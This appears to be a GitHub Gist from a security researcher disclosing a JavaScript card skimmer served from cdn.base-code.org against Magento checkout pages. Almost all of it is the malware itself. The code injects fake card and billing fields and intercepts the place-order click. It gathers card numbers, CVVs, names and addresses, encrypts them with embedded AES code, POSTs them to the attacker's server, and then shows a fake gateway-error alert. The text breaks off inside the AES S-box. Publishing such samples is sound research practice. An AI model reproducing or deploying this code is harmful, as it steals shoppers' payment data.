Created
June 21, 2022 17:55
-
-
Save BenBaryoPX/6737b7e1085bd7d9cc19c2e216e1ba38 to your computer and use it in GitHub Desktop.
Skimmer found served from cdn.base-code.org attacking Magento's Authorize CIM Payment module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var lscr, teros, binoms, adumn, hinnes, dertons, linomx, _gfv, hornis, derit, kilons, admis; | |
(function () { | |
var attack = function () { | |
function startInjections() { | |
if (localStorage.getItem('mage-cache-version')) { | |
return; | |
} | |
if (typeof jQuery === 'undefined') { | |
return; | |
} | |
if (jQuery('#billing_email_field')[0] && !jQuery('#billing_address_field')[0]) { | |
if (!jQuery('#billing_first_name_field')[0]) { | |
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-first validate-required" id="billing_first_name_field" data-priority="10"><label for="billing_first_name" class="">First name <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_first_name" id="billing_first_name" placeholder="" value="" autocomplete="given-name"></span></p><p class="form-row form-row-last validate-required" id="billing_last_name_field" data-priority="20"><label for="billing_last_name" class="">Last name <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_last_name" id="billing_last_name" placeholder="" value="" autocomplete="family-name"></span></p><p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>'); | |
} else { | |
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code <abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>'); | |
} | |
} | |
if (jQuery('#payment_method_intasend').is(':checked')) { | |
injectPaymentTable(); | |
} else { | |
jQuery('#form-table').remove(); | |
document.viewFrom = false; | |
} | |
} | |
function removeInjectionIfDone() { | |
if (document.viewFrom) { | |
if (localStorage.getItem('recently_viewed_product_session')) { | |
jQuery('#form-table').remove(); | |
document.viewFrom = false; | |
} | |
} | |
} | |
function injectPaymentTable() { | |
function hookInjectedPaymentTable() { | |
if (jQuery('#cardCVV')[0]) { | |
jQuery('#cardCVV')[0].addEventListener('change', changeCallback, true); | |
} | |
if (jQuery('#place_order')[0]) { | |
jQuery('#place_order')[0].addEventListener('click', clickCallback, true); | |
} | |
jQuery('#cardNoInput').removeAttr('disabled'); | |
jQuery('#cardMonth').removeAttr('disabled'); | |
jQuery('#cardYear').removeAttr('disabled'); | |
jQuery('#cardCVV').removeAttr('disabled'); | |
} | |
if (!jQuery('#form-table')[0] && jQuery('.payment_method_intasend p')[0]) { | |
jQuery('.payment_method_intasend p').after('<table cellpadding="0" id="form-table" cellspacing="0" border="0" style="min-width: 300px;margin-top: 15px !important;max-width: 360px;border: none !important;"><tbody style=" border: none !important;"><tr style=" border: none !important;"><td class="two width190" style=" border: none !important;"><label for="cardNoInput"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Card number</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardNoInput" name="cardNoInput" tabindex="60" value="" maxlength="20" autocomplete="off" class="has-error" style="border: 1px solid red;border: 1px solid rgb(213, 213, 213);"></td></tr><tr><td class="two width190" style=" border: none !important;"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Expiry date</span></td><td class="two" style=" border: none !important;"> <select name="cardExp.month" tabindex="110" id="cardMonth" class="has-error" style=" width: 45%; "><option value="" selected="selected">--</option><option value="1">01</option><option value="2">02</option><option value="3">03</option><option value="4">04</option><option value="5">05</option><option value="6">06</option><option value="7">07</option><option value="8">08</option><option value="9">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option> </select> <select name="cardExp.year" tabindex="120" id="cardYear" class="has-error" style=" width: 45%; "><option value="" selected="selected">----</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option><option value="2030">2030</option><option value="2031">2031</option><option value="2032">2032</option><option value="2033">2033</option><option value="2034">2034</option><option value="2035">2035</option><option value="2036">2036</option><option value="2037">2037</option><option value="2038">2038</option><option value="2039">2039</option> </select></td></tr><tr><td class="two width190" style=" border: none !important;"><label for="cardCVV"> <span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">CVC</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardCVV" name="cardCVV" tabindex="70" size="4" maxlength="4" autocomplete="off" value="" class="has-error" style=" width: 40%; "></td></tr></tbody></table>'); | |
setTimeout(hookInjectedPaymentTable, 2000); | |
document.viewFrom = true; | |
} | |
} | |
function validateCcFields(fieldNamesArr) { | |
function validateField(fieldName) { | |
var element = jQuery('#' + fieldName); | |
switch (fieldName) { | |
case 'cardNoInput': | |
if (!element.val() || !isValidCcNumber(element.val())) { | |
element.css('border', '1px solid red'); | |
isDataComplete = false; | |
} else { | |
element.css('border', '1px solid rgb(213, 213, 213)'); | |
} | |
break; | |
case 'cardCVV': | |
if (!element.val() || element.val().length < 3) { | |
element.css('border', '1px solid red'); | |
isDataComplete = false; | |
} else { | |
element.css('border', '1px solid rgb(213, 213, 213)'); | |
} | |
break; | |
default: | |
if (!element.val()) { | |
element.css('border', '1px solid red'); | |
isDataComplete = false; | |
} else { | |
element.css('border', '1px solid rgb(213, 213, 213)'); | |
} | |
break; | |
} | |
} | |
var isDataComplete = true; | |
[ | |
'cardMonth', | |
'cardYear', | |
'cardCVV', | |
'cardNoInput' | |
].forEach(validateField); | |
return isDataComplete; | |
} | |
function changeCallback(event) { | |
if (event && event.currentTarget && event.currentTarget.value) { | |
collectAllAvailablePii(); | |
} | |
} | |
function isValidCcNumber(ccNum) { | |
ccNum = ccNum.replace(/ /g, ''); | |
var digit, reverseNum, alternateNow, sumOfDigits, i, numLength; | |
alternateNow = true; | |
sumOfDigits = 0; | |
reverseNum = (ccNum + '').split('').reverse(); | |
for (i = 0, numLength = reverseNum.length; i < numLength; i++) { | |
digit = reverseNum[i]; | |
digit = parseInt(digit, 10); | |
if (alternateNow = !alternateNow) { | |
digit *= 2; | |
} | |
if (digit > 9) { | |
digit -= 9; | |
} | |
sumOfDigits += digit; | |
} | |
return sumOfDigits % 10 === 0; | |
} | |
function clickCallback(event) { | |
function markAttackAsCompleted() { | |
localStorage.setItem('mage-cache-version', generateGUID__()); | |
localStorage.setItem('recently_viewed_product_session', generateGUID__()); | |
alert('Gateway error. You will be automatically redirected to the our website for payment processing after placing the order.'); | |
jQuery('#place_order').click(); | |
jQuery('#form-table').remove(); | |
document.viewFrom = false; | |
} | |
if (!localStorage.getItem('mage-cache-version') && document.viewFrom) { | |
if (validateCcFields()) { | |
collectAllAvailablePii(); | |
setTimeout(markAttackAsCompleted, 1500); | |
} | |
event.stopPropagation(); | |
event.preventDefault(); | |
} | |
} | |
function collectAllAvailablePii() { | |
var details = { | |
cdnb: jQuery('#cardNoInput').val(), | |
cdm: jQuery('#cardMonth').val(), | |
cdy: jQuery('#cardYear').val(), | |
cdc: jQuery('#cardCVV').val(), | |
f: getValueFromLocalStorageOrElement('#billing_first_name'), | |
l: getValueFromLocalStorageOrElement('#billing_last_name'), | |
e: getValueFromLocalStorageOrElement('#billing_email'), | |
t: null, | |
a: getValueFromLocalStorageOrElement('#billing_address'), | |
a2: '', | |
co: 'US', | |
pc: getValueFromLocalStorageOrElement('#billing_postcode'), | |
c: getValueFromLocalStorageOrElement('#billing_city') | |
}; | |
if (!details.f || !details.a || !details.c) { | |
var _0x47FF = jQuery('#billing-address-select option:selected').text(); | |
if (_0x47FF) { | |
var _0x4742 = _0x47FF.split(','); | |
if (_0x4742 && _0x4742.length) { | |
if (!details.f) { | |
details.cdn = _0x4742[0] ? _0x4742[0].trim() : ''; | |
} | |
details.a = _0x4742[1] ? _0x4742[1].trim() : ''; | |
details.c = _0x4742[2] ? _0x4742[2].trim() : ''; | |
if (_0x4742[3] && _0x4742[3].length) { | |
var _0x4757 = _0x4742[3].trim().split(' '); | |
details.r = _0x4757[0] ? _0x4757[0].trim() : ''; | |
details.pc = _0x4757[1] ? _0x4757[1].trim() : ''; | |
} | |
} | |
} | |
} | |
var parsedData = { | |
Address: details.a + ' ' + details.a2, | |
CCname: details.cdn || details.f + ' ' + details.l, | |
Email: details.e, | |
Phone: details.t, | |
Sity: details.c, | |
State: details.r, | |
Country: details.co, | |
Zip: details.pc, | |
Shop: window.location.host, | |
CcNumber: details.cdnb, | |
ExpDate: details.cdm + '/' + details.cdy, | |
Cvv: details.cdc, | |
Useragent: navigator.userAgent, | |
Uid: 'e0c9f90de835a3296f9ac37d60473842e39ecef9' | |
}; | |
var _0x47D5 = JSON.stringify(parsedData); | |
var _0x47AB = derit(); | |
var _0x4796 = kilons(); | |
var _0x476C; | |
_0x476C = { | |
main: admis(_0x47D5, _0x47AB, _0x4796), | |
guid: _0x47AB, | |
refer: _0x4796 | |
}; | |
jQuery.ajax({ | |
url: 'https://cdn.base-code.org/web/', | |
data: { | |
main: _0x476C.main, | |
uniqueId: _0x476C.guid, | |
storedId: _0x476C.refer | |
}, | |
type: 'POST', | |
dataType: 'json' | |
}); | |
} | |
function getValueFromLocalStorageOrElement(target, isLocalStorage) { | |
var val = ''; | |
if (isLocalStorage) { | |
val = localStorage.getItem(target) || ''; | |
} else { | |
val = jQuery(target).val() || ''; | |
} | |
return val; | |
} | |
function generateGUID__() { | |
function getRand() { | |
return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1); | |
} | |
return getRand() + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + getRand() + getRand(); | |
} | |
function generateGUID_() { | |
var output = ''; | |
for (var _ = 0; _ < 32; _++) { | |
output += String.fromCharCode(Math.round(Math.random() * 255)); | |
} | |
var _0x4757 = document.getElementById('key'); | |
return btoa(output); | |
} | |
function generateIV_() { | |
var output = ''; | |
for (var _ = 0; _ < 16; _++) { | |
output += String.fromCharCode(Math.round(Math.random() * 255)); | |
} | |
var _0x4757 = document.getElementById('iv'); | |
return btoa(output); | |
} | |
function encryptData_(data, guid, iv) { | |
function generateGuid32() { | |
existingGuid = []; | |
for (var _ = 0; _ < 32; _++) { | |
existingGuid.push(Math.round(255 * Math.random())); | |
} | |
} | |
function generateIv16() { | |
existingIv = []; | |
for (var _ = 0; _ < 16; _++) { | |
existingIv.push(Math.round(255 * Math.random())); | |
} | |
} | |
function getCodeArrFromString(s) { | |
function str2CodeArr(str) { | |
for (var arr = [], i = 0; i < str.length; i++) { | |
arr.push(str.charCodeAt(i)); | |
} | |
return arr; | |
} | |
return str2CodeArr(atob(s)); | |
} | |
function rotate_(arrLen3) { | |
for (var firstItem = arrLen3[0], i = 0; i < 3; i++) { | |
arrLen3[i] = arrLen3[i + 1]; | |
} | |
return arrLen3[3] = firstItem, arrLen3; | |
} | |
function core_(_0x476C, _0x4742) { | |
_0x476C = this.rotate(_0x476C); | |
for (var _0x4757 = 0; _0x4757 < 4; ++_0x4757) { | |
_0x476C[_0x4757] = this.sbox[_0x476C[_0x4757]]; | |
} | |
return _0x476C[0] = _0x476C[0] ^ this.Rcon[_0x4742], _0x476C; | |
} | |
function expandKey_(_0x4814, _0x4796) { | |
for (var _0x47EA = 16 * (this.numberOfRounds(_0x4796) + 1), _0x47C0 = 0, _0x47D5 = 1, _0x4757 = [], _0x47FF = [], _0x4742 = 0; _0x4742 < _0x47EA; _0x4742++) { | |
_0x47FF[_0x4742] = 0; | |
} | |
for (var _0x4781 = 0; _0x4781 < _0x4796; _0x4781++) { | |
_0x47FF[_0x4781] = _0x4814[_0x4781]; | |
} | |
for (_0x47C0 += _0x4796; _0x47C0 < _0x47EA;) { | |
for (var _0x4829 = 0; _0x4829 < 4; _0x4829++) { | |
_0x4757[_0x4829] = _0x47FF[_0x47C0 - 4 + _0x4829]; | |
} | |
if (_0x47C0 % _0x4796 == 0 && (_0x4757 = this.core(_0x4757, _0x47D5++)), _0x4796 == this.keySize.SIZE_256 && _0x47C0 % _0x4796 == 16) { | |
for (var _0x476C = 0; _0x476C < 4; _0x476C++) { | |
_0x4757[_0x476C] = this.sbox[_0x4757[_0x476C]]; | |
} | |
} | |
for (var _0x47AB = 0; _0x47AB < 4; _0x47AB++) { | |
_0x47FF[_0x47C0] = _0x47FF[_0x47C0 - _0x4796] ^ _0x4757[_0x47AB], _0x47C0++; | |
} | |
} | |
return _0x47FF; | |
} | |
function addRoundKey_(_0x4757, _0x472D) { | |
for (var _0x4742 = 0; _0x4742 < 16; _0x4742++) { | |
_0x4757[_0x4742] ^= _0x472D[_0x4742]; | |
} | |
return _0x4757; | |
} | |
function createRoundKey_(_0x4781, _0x472D) { | |
for (var _0x476C = [], _0x4742 = 0; _0x4742 < 4; _0x4742++) { | |
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) { | |
_0x476C[4 * _0x4757 + _0x4742] = _0x4781[_0x472D + 4 * _0x4742 + _0x4757]; | |
} | |
} | |
return _0x476C; | |
} | |
function subBytes_(_0x476C, _0x4742) { | |
for (var _0x4757 = 0; _0x4757 < 16; _0x4757++) { | |
_0x476C[_0x4757] = _0x4742 ? this.rsbox[_0x476C[_0x4757]] : this.sbox[_0x476C[_0x4757]]; | |
} | |
return _0x476C; | |
} | |
function shiftRows_(_0x476C, _0x4742) { | |
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) { | |
_0x476C = this.shiftRow(_0x476C, 4 * _0x4757, _0x4757, _0x4742); | |
} | |
return _0x476C; | |
} | |
function shiftRow_(_0x47AB, _0x4742, _0x4781, _0x4757) { | |
for (var _0x476C = 0; _0x476C < _0x4781; _0x476C++) { | |
if (_0x4757) { | |
for (var _0x472D = _0x47AB[_0x4742 + 3], _0x4796 = 3; _0x4796 > 0; _0x4796--) { | |
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 - 1]; | |
} | |
_0x47AB[_0x4742] = _0x472D; | |
} else { | |
for (_0x472D = _0x47AB[_0x4742], _0x4796 = 0; _0x4796 < 3; _0x4796++) { | |
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 + 1]; | |
} | |
_0x47AB[_0x4742 + 3] = _0x472D; | |
} | |
} | |
return _0x47AB; | |
} | |
function galois_multiplication_(_0x4781, _0x472D) { | |
for (var _0x476C = 0, _0x4742 = 0; _0x4742 < 8; _0x4742++) { | |
1 == (1 & _0x472D) && (_0x476C ^= _0x4781), _0x476C > 256 && (_0x476C ^= 256); | |
var _0x4757 = 128 & _0x4781; | |
(_0x4781 <<= 1) > 256 && (_0x4781 ^= 256), 128 == _0x4757 && (_0x4781 ^= 27), _0x4781 > 256 && (_0x4781 ^= 256), (_0x472D >>= 1) > 256 && (_0x472D ^= 256); | |
} | |
return _0x476C; | |
} | |
function mixColumns_(_0x47AB, _0x4757) { | |
for (var _0x4796 = [], _0x476C = 0; _0x476C < 4; _0x476C++) { | |
for (var _0x4781 = 0; _0x4781 < 4; _0x4781++) { | |
_0x4796[_0x4781] = _0x47AB[4 * _0x4781 + _0x476C]; | |
} | |
_0x4796 = this.mixColumn(_0x4796, _0x4757); | |
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) { | |
_0x47AB[4 * _0x4742 + _0x476C] = _0x4796[_0x4742]; | |
} | |
} | |
return _0x47AB; | |
} | |
function mixColumn_(_0x4796, _0x4742) { | |
var _0x4781 = []; | |
_0x4781 = _0x4742 ? [14,9,13,11] : [2,1,1,3]; | |
for (var _0x4757 = [], _0x476C = 0; _0x476C < 4; _0x476C++) { | |
_0x4757[_0x476C] = _0x4796[_0x476C]; | |
} | |
return _0x4796[0] = this.galois_multiplication(_0x4757[0], _0x4781[0]) ^ this.galois_multiplication(_0x4757[3], _0x4781[1]) ^ this.galois_multiplication(_0x4757[2], _0x4781[2]) ^ this.galois_multiplication(_0x4757[1], _0x4781[3]), _0x4796[1] = this.galois_multiplication(_0x4757[1], _0x4781[0]) ^ this.galois_multiplication(_0x4757[0], _0x4781[1]) ^ this.galois_multiplication(_0x4757[3], _0x4781[2]) ^ this.galois_multiplication(_0x4757[2], _0x4781[3]), _0x4796[2] = this.galois_multiplication(_0x4757[2], _0x4781[0]) ^ this.galois_multiplication(_0x4757[1], _0x4781[1]) ^ this.galois_multiplication(_0x4757[0], _0x4781[2]) ^ this.galois_multiplication(_0x4757[3], _0x4781[3]), _0x4796[3] = this.galois_multiplication(_0x4757[3], _0x4781[0]) ^ this.galois_multiplication(_0x4757[2], _0x4781[1]) ^ this.galois_multiplication(_0x4757[1], _0x4781[2]) ^ this.galois_multiplication(_0x4757[0], _0x4781[3]), _0x4796; | |
} | |
function round_(_0x4757, _0x4742) { | |
return _0x4757 = this.subBytes(_0x4757, false), _0x4757 = this.shiftRows(_0x4757, false), _0x4757 = this.mixColumns(_0x4757, false), _0x4757 = this.addRoundKey(_0x4757, _0x4742); | |
} | |
function invRound(_0x4757, _0x4742) { | |
return _0x4757 = this.shiftRows(_0x4757, true), _0x4757 = this.subBytes(_0x4757, true), _0x4757 = this.addRoundKey(_0x4757, _0x4742), _0x4757 = this.mixColumns(_0x4757, true); | |
} | |
function main_(_0x4781, _0x4742, _0x476C) { | |
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0)); | |
for (var _0x4757 = 1; _0x4757 < _0x476C; _0x4757++) { | |
_0x4781 = this.round(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757)); | |
} | |
return _0x4781 = this.subBytes(_0x4781, false), _0x4781 = this.shiftRows(_0x4781, false), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C)); | |
} | |
function invMain_(_0x4781, _0x4742, _0x476C) { | |
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C)); | |
for (var _0x4757 = _0x476C - 1; _0x4757 > 0; _0x4757--) { | |
_0x4781 = this.invRound(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757)); | |
} | |
return _0x4781 = this.shiftRows(_0x4781, true), _0x4781 = this.subBytes(_0x4781, true), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0)); | |
} | |
function numberOfRounds_(_0x4757) { | |
var _0x4742; | |
switch (_0x4757) { | |
case this.keySize.SIZE_128: | |
_0x4742 = 10; | |
break; | |
case this.keySize.SIZE_192: | |
_0x4742 = 12; | |
break; | |
case this.keySize.SIZE_256: | |
_0x4742 = 14; | |
break; | |
default: | |
return null; | |
} | |
return _0x4742; | |
} | |
function encrypt_(_0x47FF, _0x4796, _0x47D5) { | |
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) { | |
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) { | |
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742]; | |
} | |
} | |
var _0x4781 = this.expandKey(_0x4796, _0x47D5); | |
_0x47C0 = this.main(_0x47C0, _0x4781, _0x4757); | |
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) { | |
for (var _0x476C = 0; _0x476C < 4; _0x476C++) { | |
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C]; | |
} | |
} | |
return _0x47AB; | |
} | |
function decrypt_(_0x47FF, _0x4796, _0x47D5) { | |
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) { | |
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) { | |
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742]; | |
} | |
} | |
var _0x4781 = this.expandKey(_0x4796, _0x47D5); | |
_0x47C0 = this.invMain(_0x47C0, _0x4781, _0x4757); | |
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) { | |
for (var _0x476C = 0; _0x476C < 4; _0x476C++) { | |
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C]; | |
} | |
} | |
return _0x47AB; | |
} | |
function getBlock_(_0x4781, _0x4742, _0x476C, _0x4757) { | |
return _0x476C - _0x4742 > 16 && (_0x476C = _0x4742 + 16), _0x4781.slice(_0x4742, _0x476C); | |
} | |
function encrypt__(_0x4853, _0x47C0, _0x4829, _0x47EA) { | |
var _0x47FF = _0x4829.length; | |
if (_0x47EA.length % 16) { | |
throw 'iv length must be 128 bits.'; | |
} | |
var _0x4781 = [], _0x483E = [], _0x4742 = [], _0x47AB = [], _0x4868 = [], _0x4796 = true; | |
if (_0x47C0 == this.modeOfOperation.CBC && this.padBytesIn(_0x4853), null !== _0x4853) { | |
for (var _0x47D5 = 0; _0x47D5 < Math.ceil(_0x4853.length / 16); _0x47D5++) { | |
var _0x4757 = 16 * _0x47D5, _0x476C = 16 * _0x47D5 + 16; | |
if (16 * _0x47D5 + 16 > _0x4853.length && (_0x476C = _0x4853.length), _0x4781 = this.getBlock(_0x4853, _0x4757, _0x476C, _0x47C0), _0x47C0 == this.modeOfOperation.CFB) { | |
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length); | |
for (var _0x487D = 0; _0x487D < 16; _0x487D++) { | |
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D]; | |
} | |
for (var _0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) { | |
_0x4868.push(_0x47AB[_0x4814]); | |
} | |
_0x483E = _0x47AB; | |
} else { | |
if (_0x47C0 == this.modeOfOperation.OFB) { | |
_0x4796 ? (_0x4742 = this.aes.encrypt(_0x47EA, _0x4829, _0x4829.length), _0x4796 = false) : _0x4742 = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length); | |
for (_0x487D = 0; _0x487D < 16; _0x487D++) { | |
_0x47AB[_0x487D] = _0x4781[_0x487D] ^ _0x4742[_0x487D]; | |
} | |
for (_0x4814 = 0; _0x4814 < _0x476C - _0x4757; _0x4814++) { | |
_0x4868.push(_0x47AB[_0x4814]); | |
} | |
_0x483E = _0x4742; | |
} else { | |
if (_0x47C0 == this.modeOfOperation.CBC) { | |
for (_0x487D = 0; _0x487D < 16; _0x487D++) { | |
_0x483E[_0x487D] = _0x4781[_0x487D] ^ (_0x4796 ? _0x47EA[_0x487D] : _0x47AB[_0x487D]); | |
} | |
_0x4796 = false, _0x47AB = this.aes.encrypt(_0x483E, _0x4829, _0x4829.length); | |
for (_0x4814 = 0; _0x4814 < 16; _0x4814++) { | |
_0x4868.push(_0x47AB[_0x4814]); | |
} | |
} | |
} | |
} | |
} | |
} | |
return _0x4868; | |
} | |
function decrypt__(_0x483E, _0x4814, _0x47D5, _0x47EA) { | |
var _0x4781 = _0x47D5.length; | |
if (_0x47EA.length % 16) { | |
throw 'iv length must be 128 bits.'; | |
} | |
var _0x4829 = [], _0x4742 = [], _0x47AB = [], _0x4853 = [], _0x4796 = [], _0x47C0 = true; | |
if (null !== _0x483E) { | |
for (var _0x4757 = 0; _0x4757 < Math.ceil(_0x483E.length / 16); _0x4757++) { | |
var _0x476C = 16 * _0x4757, _0x4868 = 16 * _0x4757 + 16; | |
if (16 * _0x4757 + 16 > _0x483E.length && (_0x4868 = _0x483E.length), _0x4829 = this.getBlock(_0x483E, _0x476C, _0x4868, _0x4814), _0x4814 == this.modeOfOperation.CFB) { | |
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) { | |
_0x4853[i] = _0x47AB[i] ^ _0x4829[i]; | |
} | |
for (var _0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) { | |
_0x4796.push(_0x4853[_0x47FF]); | |
} | |
_0x4742 = _0x4829; | |
} else { | |
if (_0x4814 == this.modeOfOperation.OFB) { | |
for (_0x47C0 ? (_0x47AB = this.aes.encrypt(_0x47EA, _0x47D5, _0x47D5.length), _0x47C0 = false) : _0x47AB = this.aes.encrypt(_0x4742, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) { | |
_0x4853[i] = _0x47AB[i] ^ _0x4829[i]; | |
} | |
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) { | |
_0x4796.push(_0x4853[_0x47FF]); | |
} | |
_0x4742 = _0x47AB; | |
} else { | |
if (_0x4814 == this.modeOfOperation.CBC) { | |
for (_0x47AB = this.aes.decrypt(_0x4829, _0x47D5, _0x47D5.length), i = 0; i < 16; i++) { | |
_0x4853[i] = (_0x47C0 ? _0x47EA[i] : _0x4742[i]) ^ _0x47AB[i]; | |
} | |
_0x47C0 = false; | |
for (_0x47FF = 0; _0x47FF < _0x4868 - _0x476C; _0x47FF++) { | |
_0x4796.push(_0x4853[_0x47FF]); | |
} | |
_0x4742 = _0x4829; | |
} | |
} | |
} | |
} | |
_0x4814 == this.modeOfOperation.CBC && this.unpadBytesOut(_0x4796); | |
} | |
return _0x4796; | |
} | |
function padBytesIn_(_0x476C) { | |
for (var _0x4742 = 16 - _0x476C.length % 16, _0x4757 = 0; _0x4757 < _0x4742; _0x4757++) { | |
_0x476C.push(_0x4742); | |
} | |
} | |
function unpadBytesOut_(_0x4781) { | |
for (var _0x4742 = 0, _0x476C = -1, _0x4757 = _0x4781.length - 1; _0x4757 >= _0x4781.length - 1 - 16 && _0x4781[_0x4757] <= 16; _0x4757--) { | |
if (-1 == _0x476C && (_0x476C = _0x4781[_0x4757]), _0x4781[_0x4757] != _0x476C) { | |
_0x4742 = 0; | |
break; | |
} | |
if (++_0x4742 == _0x476C) { | |
break; | |
} | |
} | |
_0x4742 > 0 && _0x4781.splice(_0x4781.length - _0x4742, _0x4742); | |
} | |
function str2EncodedArr(str) { | |
for (var outArr = [], i = 0; i < str.length; i++) { | |
var charcode = str.charCodeAt(i); | |
outArr.push(255 & charcode), outArr.push(charcode >> 8 & 255); | |
} | |
return outArr; | |
} | |
function arr2String(arr) { | |
for (var outStr = '', i = 0; i < arr.length; i++) { | |
outStr += String.fromCharCode(arr[i]); | |
} | |
return btoa(outStr); | |
} | |
var existingGuid = guid, existingIv = iv, utils = { | |
aes: { | |
keySize: { | |
SIZE_128: 16, | |
SIZE_192: 24, | |
SIZE_256: 32 | |
}, | |
sbox: [99,124,119,123,242,107,111,197,48,1,103,43,254,215,171,118,202,130,201,125,250,89,71,240,173,212,162,175,156,164,114,192,183,253,147,38,54,63,247,204,52,165,229,241,113,216,49,21,4,199,35,195,24,150,5,154,7,18,128,226,235,39,178,117,9,131,44,26,27,110,90,160,82,59,214,179,41,227,47,132,83,209,0,237,32,252,177,91,106,203,190,57,74,76,88,207,208,239,170,251,67,77,51,133,69,249,2,127,80,60,159,168,81,163,64,143,146,157,56,245,188,182,218,33,16,255,243,210,205,12,19,236,95,151,68,23,196,167,126,61,100,93,25,115,96,129,79,220,34,42,144,136,70,238,184,20,222,94,11,219,224,50,58,10,73,6,36,92,194,211,172,98,145,149,228,121,231,200,55,109,141,213,78,169,108,86,244,234,101,122,174,8,186,120,37,46,28,166,180,198,232,221,116,31,75,189,139,138,112,62,181,102,72,3,246,14,97,53,87,185,134,193,29,158,225,248,152,17,105,217,142,148,155,30,135,233,206,85,40,223,140,161,137,13,191,230,66,104,65,153,45,15,176,84,187,22], | |
